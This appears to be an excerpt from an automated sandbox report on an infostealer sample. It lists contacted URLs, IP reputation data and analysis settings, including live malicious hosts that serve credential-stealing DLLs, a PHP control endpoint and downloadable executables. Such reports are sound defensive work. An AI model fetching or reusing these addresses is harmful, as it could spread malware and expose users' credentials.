                                                              https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1732700967943&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                                                high
                                                                http://185.215.113.43/Zu7JuNko/index.phpfalse
                                                                  high
                                                                  http://185.215.113.206/68b591d6548ec281/freebl3.dllfalse
                                                                    high
                                                                    http://185.215.113.206/68b591d6548ec281/nss3.dllfalse
                                                                      high
                                                                      https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0false
                                                                        high
                                                                        https://file4.gofile.io/download/direct/79b47216-17a9-4db2-9e53-0d70fd5ed1e5/knotc.exefalse
                                                                          high
                                                                          https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1732700973619&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                                                            high
                                                                            https://sb.scorecardresearch.com/b2?rn=1732700967945&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=39EBC277A9596CA639AAD733A8706D90&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*nullfalse
                                                                              high
                                                                              https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1732700974626&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                                                                high
                                                                                https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1732700974592&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                                                                  high
                                                                                  https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1732700973623&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                                                                    high
                                                                                    http://185.215.113.206/68b591d6548ec281/vcruntime140.dllfalse
                                                                                      high
                                                                                      https://clients2.googleusercontent.com/crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crxfalse
                                                                                        high
                                                                                        http://185.215.113.16/mine/random.exefalse
                                                                                          high
                                                                                          http://185.215.113.206/68b591d6548ec281/sqlite3.dllfalse
                                                                                            high
                                                                                            https://c.msn.com/c.gif?rnd=1732700967945&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=3717764927f647ecb68b34236b867e95&activityId=3717764927f647ecb68b34236b867e95&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=47F7869059534BA19110C6BE745DBB28&MUID=39EBC277A9596CA639AAD733A8706D90false
                                                                                              high
                                                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                                                              https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0file.exe, 00000002.00000002.1858312701.0000000023E41000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://duckduckgo.com/chrome_newtabfile.exe, 00000002.00000003.1516748038.00000000019F3000.00000004.00000020.00020000.00000000.sdmp, CAEHCFCB.2.dr, Web Data.15.drfalse
                                                                                                  high
                                                                                                  https://c.msn.com/2cc80dabc69f58b6_1.15.drfalse
                                                                                                    high
                                                                                                    https://duckduckgo.com/ac/?q=file.exe, 00000002.00000003.1516748038.00000000019F3000.00000004.00000020.00020000.00000000.sdmp, CAEHCFCB.2.dr, Web Data.15.drfalse
                                                                                                      high
                                                                                                      https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drfalse
                                                                                                        high
                                                                                                        https://ntp.msn.com/0000003.log7.15.drfalse
                                                                                                          high
                                                                                                          https://ntp.msn.com/_defaultQuotaManager.15.drfalse
                                                                                                            high
                                                                                                            https://www.last.fm/559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drfalse
                                                                                                              high
                                                                                                              https://ntp.msn.cn/edge/ntp2cc80dabc69f58b6_1.15.drfalse
                                                                                                                high
                                                                                                                https://sb.scorecardresearch.com/2cc80dabc69f58b6_1.15.drfalse
                                                                                                                  high
                                                                                                                  https://docs.google.com/manifest.json0.15.drfalse
                                                                                                                    high
                                                                                                                    https://www.youtube.com559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drfalse
                                                                                                                      high
                                                                                                                      https://www.instagram.com559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drfalse
                                                                                                                        high
                                                                                                                        https://web.skype.com/?browsername=edge_canary_shoreline559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drfalse
                                                                                                                          high
                                                                                                                          https://drive.google.com/manifest.json0.15.drfalse
                                                                                                                            high
                                                                                                                            https://file4.gofile.io/download/direct/79b47216-17a9-4db2-9e53-0d70fd5ed1e5/knotc.exekskotes.exe, 0000001F.00000003.2121237291.00000000012E6000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000001F.00000003.2510002187.00000000012E6000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000001F.00000002.2530110803.00000000012E7000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000001F.00000003.2121426466.00000000012E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drfalse
                                                                                                                                high
                                                                                                                                https://file4.gofile.io/download/direct/79b47216-17a9-4db2-9e53-0d70fd5ed1e5/knotc.exegskotes.exe, 0000001F.00000003.2121237291.00000000012E6000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000001F.00000003.2510002187.00000000012E6000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000001F.00000002.2530110803.00000000012E7000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000001F.00000003.2121426466.00000000012E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drfalse
                                                                                                                                    high
                                                                                                                                    https://store1.gofile.io/download/direct/79b47216-17a9-4db2-9e53-0d70fd5ed1e5/knotc.exe09bskotes.exe, 0000001F.00000002.2529002580.0000000001279000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://www.messenger.com559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drfalse
                                                                                                                                        high
                                                                                                                                        https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drfalse
                                                                                                                                          high
                                                                                                                                          https://outlook.office.com/mail/compose?isExtension=true559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drfalse
                                                                                                                                            high
                                                                                                                                            https://i.y.qq.com/n2/m/index.html559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drfalse
                                                                                                                                              high
                                                                                                                                              https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLKfile.exe, 00000002.00000003.1724983706.000000002409E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://www.deezer.com/559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drfalse
                                                                                                                                                  high
                                                                                                                                                  http://185.215.113.206/c4becf79229cb002.phpnbfile.exe, 00000002.00000002.1858312701.0000000023E51000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                  unknown
                                                                                                                                                  https://web.telegram.org/559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drfalse
                                                                                                                                                    high
                                                                                                                                                    http://www.mozilla.com/en-US/blocklist/file.exe, 00000002.00000002.1868728023.000000007013D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://store1.gofile.io/download/direct/79b47216-17a9-4db2-9e53-0d70fd5ed1e5/knotc.exe09bc8adskotes.exe, 0000001F.00000002.2529002580.0000000001279000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://mozilla.org0/freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://file4.gofile.io/skotes.exe, 0000001F.00000003.2121426466.00000000012E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://drive-daily-2.corp.google.com/manifest.json0.15.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://drive-daily-4.corp.google.com/manifest.json0.15.drfalse
                                                                                                                                                                high
                                                                                                                                                                http://185.215.113.206/c4becf79229cb002.php&file.exe, 00000002.00000002.1858312701.0000000023E51000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://vibe.naver.com/today559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://srtb.msn.com/2cc80dabc69f58b6_1.15.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000002.00000003.1516748038.00000000019F3000.00000004.00000020.00020000.00000000.sdmp, CAEHCFCB.2.dr, Web Data.15.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://file4.gofile.io/llowedCert_OS_1skotes.exe, 0000001F.00000002.2529002580.000000000128F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://assets.msn.come5bf6995-41a9-4cb6-af64-5cb6973f938e.tmp.16.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://www.ecosia.org/newtab/file.exe, 00000002.00000003.1516748038.00000000019F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://drive-daily-1.corp.google.com/manifest.json0.15.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://store1.gofile.io/xskotes.exe, 0000001F.00000002.2529002580.0000000001279000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://excel.new?from=EdgeM365Shoreline559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000002.00000002.1825004684.0000000000E37000.00000040.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://drive-daily-5.corp.google.com/manifest.json0.15.drfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://www.google.com/chromecontent.js.15.drfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://www.tiktok.com/559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://www.msn.com/web-notification-icon-light.png2cc80dabc69f58b6_1.15.drfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://chromewebstore.google.com/manifest.json.15.drfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgfile.exe, 00000002.00000002.1858312701.0000000023E41000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://drive-preprod.corp.google.com/manifest.json0.15.drfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://srtb.msn.cn/2cc80dabc69f58b6_1.15.drfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://msn.comXIDv10Cookies.16.drfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://chrome.google.com/webstore/manifest.json.15.drfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://y.music.163.com/m/559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                http://185.215.113.206rontdeskfile.exe, 00000002.00000002.1825004684.0000000000D85000.00000040.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://bard.google.com/559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://assets.msn.cn/resolver/2cc80dabc69f58b6_1.15.drfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://browser.events.data.msn.com/2cc80dabc69f58b6_1.15.drfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://web.whatsapp.com559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://m.kugou.com/559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://www.office.com559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://outlook.live.com/mail/0/559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              https://ntp.msn.com/edge/ntp000003.log7.15.dr, 2cc80dabc69f58b6_1.15.drfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                https://assets.msn.com/resolver/2cc80dabc69f58b6_1.15.drfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  https://store1.gofile.io/download/direct/79b47216-17a9-4db2-9e53-0d70fd5ed1e5/knotc.exeWskotes.exe, 0000001F.00000002.2529002580.000000000128F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                    https://powerpoint.new?from=EdgeM365Shoreline559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drfalse
                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000002.00000003.1516748038.00000000019F3000.00000004.00000020.00020000.00000000.sdmp, CAEHCFCB.2.dr, Web Data.15.drfalse
                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                        http://185.215.113.206/c4becf79229cb002.php9)file.exe, 00000002.00000002.1827339860.0000000001979000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        https://tidal.com/559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drfalse
                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                          https://ntp.msn.com000003.log1.15.drfalse
                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                            https://store1.gofile.io/download/direct/79b47216-17a9-4db2-9e53-0d70fd5ed1e5/knotc.exe09bcskotes.exe, 0000001F.00000002.2529002580.0000000001279000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              high
                                                                                                                                                                                                                                              http://185.215.113.206/68b591d6548ec281/msvcp140.dll&file.exe, 00000002.00000002.1827339860.0000000001979000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                              https://browser.events.data.msn.cn/2cc80dabc69f58b6_1.15.drfalse
                                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                                https://gaana.com/559243ce-9955-48b2-bbe1-17f88d0e5959.tmp.15.drfalse
                                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                                  https://drive-staging.corp.google.com/manifest.json0.15.drfalse
                                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                                    https://file4.gofile.io/Certificatesskotes.exe, 0000001F.00000002.2529002580.000000000128F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                                      https://store1.gofile.io/skotes.exe, 0000001F.00000002.2529002580.0000000001279000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                        • 75% < No. of IPs
                                                                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                        185.215.113.43
                                                                                                                                                                                                                                                        unknownPortugal
                                                                                                                                                                                                                                                        206894WHOLESALECONNECTIONSNLtrue
                                                                                                                                                                                                                                                        13.107.246.63
                                                                                                                                                                                                                                                        s-part-0035.t-0009.t-msedge.netUnited States
                                                                                                                                                                                                                                                        8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                        13.107.246.40
                                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                                        8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                        23.200.0.6
                                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                                        20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                                        13.107.43.16
                                                                                                                                                                                                                                                        l-0007.l-dc-msedge.netUnited States
                                                                                                                                                                                                                                                        8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                        172.217.19.225
                                                                                                                                                                                                                                                        googlehosted.l.googleusercontent.comUnited States
                                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                                        162.159.61.3
                                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                        108.139.47.33
                                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                                                                        23.209.72.32
                                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                                        20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                                        23.44.201.22
                                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                                        20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                                        142.250.181.68
                                                                                                                                                                                                                                                        www.google.comUnited States
                                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                                        20.110.205.119
                                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                        204.79.197.219
                                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                                        8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                        172.64.41.3
                                                                                                                                                                                                                                                        chrome.cloudflare-dns.comUnited States
                                                                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                        20.42.73.30
                                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                        172.217.17.78
                                                                                                                                                                                                                                                        plus.l.google.comUnited States
                                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                                        94.245.104.56
                                                                                                                                                                                                                                                        ssl.bingadsedgeextension-prod-europe.azurewebsites.netUnited Kingdom
                                                                                                                                                                                                                                                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                        185.215.113.16
                                                                                                                                                                                                                                                        unknownPortugal
                                                                                                                                                                                                                                                        206894WHOLESALECONNECTIONSNLtrue
                                                                                                                                                                                                                                                        239.255.255.250
                                                                                                                                                                                                                                                        unknownReserved
                                                                                                                                                                                                                                                        unknownunknownfalse
                                                                                                                                                                                                                                                        104.117.182.59
                                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                                        20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                                        20.96.153.111
                                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                        185.215.113.206
                                                                                                                                                                                                                                                        unknownPortugal
                                                                                                                                                                                                                                                        206894WHOLESALECONNECTIONSNLtrue
                                                                                                                                                                                                                                                        45.112.123.225
                                                                                                                                                                                                                                                        file4.gofile.ioSingapore
                                                                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                                                                        23.44.201.14
                                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                                        20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                                        45.112.123.227
                                                                                                                                                                                                                                                        store1.gofile.ioSingapore
                                                                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                                                                        18.165.220.110
                                                                                                                                                                                                                                                        sb.scorecardresearch.comUnited States
                                                                                                                                                                                                                                                        3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                                                                        52.228.161.161
                                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                        IP
                                                                                                                                                                                                                                                        192.168.2.7
                                                                                                                                                                                                                                                        127.0.0.1
                                                                                                                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                                        Analysis ID:1563633
                                                                                                                                                                                                                                                        Start date and time:2024-11-27 09:05:07 +01:00
                                                                                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                        Overall analysis duration:0h 10m 16s
                                                                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                        Number of analysed new started processes analysed:35
                                                                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                                                                        Sample name:file.exe
                                                                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                                                                        Classification:mal100.troj.spyw.evad.winEXE@72/296@29/29
                                                                                                                                                                                                                                                        EGA Information:
                                                                                                                                                                                                                                                        • Successful, ratio: 20%
                                                                                                                                                                                                                                                        HCA Information:Failed
                                                                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 216.58.208.227, 172.217.19.238, 74.125.205.84, 34.104.35.123, 199.232.214.172, 172.217.21.35, 172.217.19.202, 142.250.181.106, 172.217.17.42, 142.250.181.138, 172.217.17.74, 142.250.181.74, 172.217.19.170, 172.217.19.234, 13.87.96.169, 204.79.197.203, 204.79.197.239, 13.107.21.239, 13.107.6.158, 2.16.158.176, 2.16.158.170, 2.16.158.82, 2.16.158.74, 2.16.158.75, 2.16.158.88, 2.16.158.89, 2.16.158.171, 2.16.158.96, 23.48.23.151, 23.48.23.152, 104.116.245.17, 104.116.245.9, 2.16.158.83, 2.16.158.59, 2.16.158.56, 2.16.158.80, 2.16.158.72, 2.19.198.225, 2.19.198.224, 2.19.198.249, 2.19.198.232, 2.19.198.250, 2.19.198.226, 2.19.198.242, 2.19.198.241, 2.19.198.233, 13.74.129.1, 2.16.158.81, 2.16.158.169, 2.16.158.97, 13.107.22.237, 131.253.33.237, 131.253.33.203, 2.16.158.34, 2.16.158.48, 2.16.158.40, 2.16.158.27, 2.16.158.58, 2.16.158.35, 142.251.40.163, 142.250.80.99, 142.251.40.99
                                                                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, data-edge.smartscreen.microsoft.com, img-s-msn-com.akamaized.net, clientservices.googleapis.com, edgeassetservice.afd.azureedge.net, clients2.google.com, e86303.dscx.akamaiedge.net, login.live.com, config-edge-skype.l-0007.l-msedge.net, dual-a-0034.dc-msedge.net, www.gstatic.com, e28578.d.akamaiedge.net, www.bing.com, assets.msn.com.edgekey.net, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, c-bing-com.dual-a-0034.a-msedge.net, ogads-pa.googleapis.com, prod-atm-wds-edge.trafficmanager.net, www-www.bing.com.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, a1834.dscg2.akamai.net, edgedl.me.gvt1.com, c.bing.com, edgeassetservice.azureedge.net, clients.l.google.com, config.edge.skype.com.trafficmanager.net, c-msn-com-nsatc.trafficmanager.net, time.windows.com, a-0003.dc-msedge.net, www.bing.com.edgekey.net, th.bing.com, msedge.b.tlu.dl.delivery.mp.microsoft
                                                                                                                                                                                                                                                        • Execution Graph export aborted for target DocumentsGDHDHJEBGH.exe, PID 8504 because it is empty
                                                                                                                                                                                                                                                        • Execution Graph export aborted for target file.exe, PID 5788 because there are no executed function
                                                                                                                                                                                                                                                        • Execution Graph export aborted for target skotes.exe, PID 8868 because there are no executed function
                                                                                                                                                                                                                                                        • Execution Graph export aborted for target skotes.exe, PID 9076 because there are no executed function
                                                                                                                                                                                                                                                        • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                                        • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
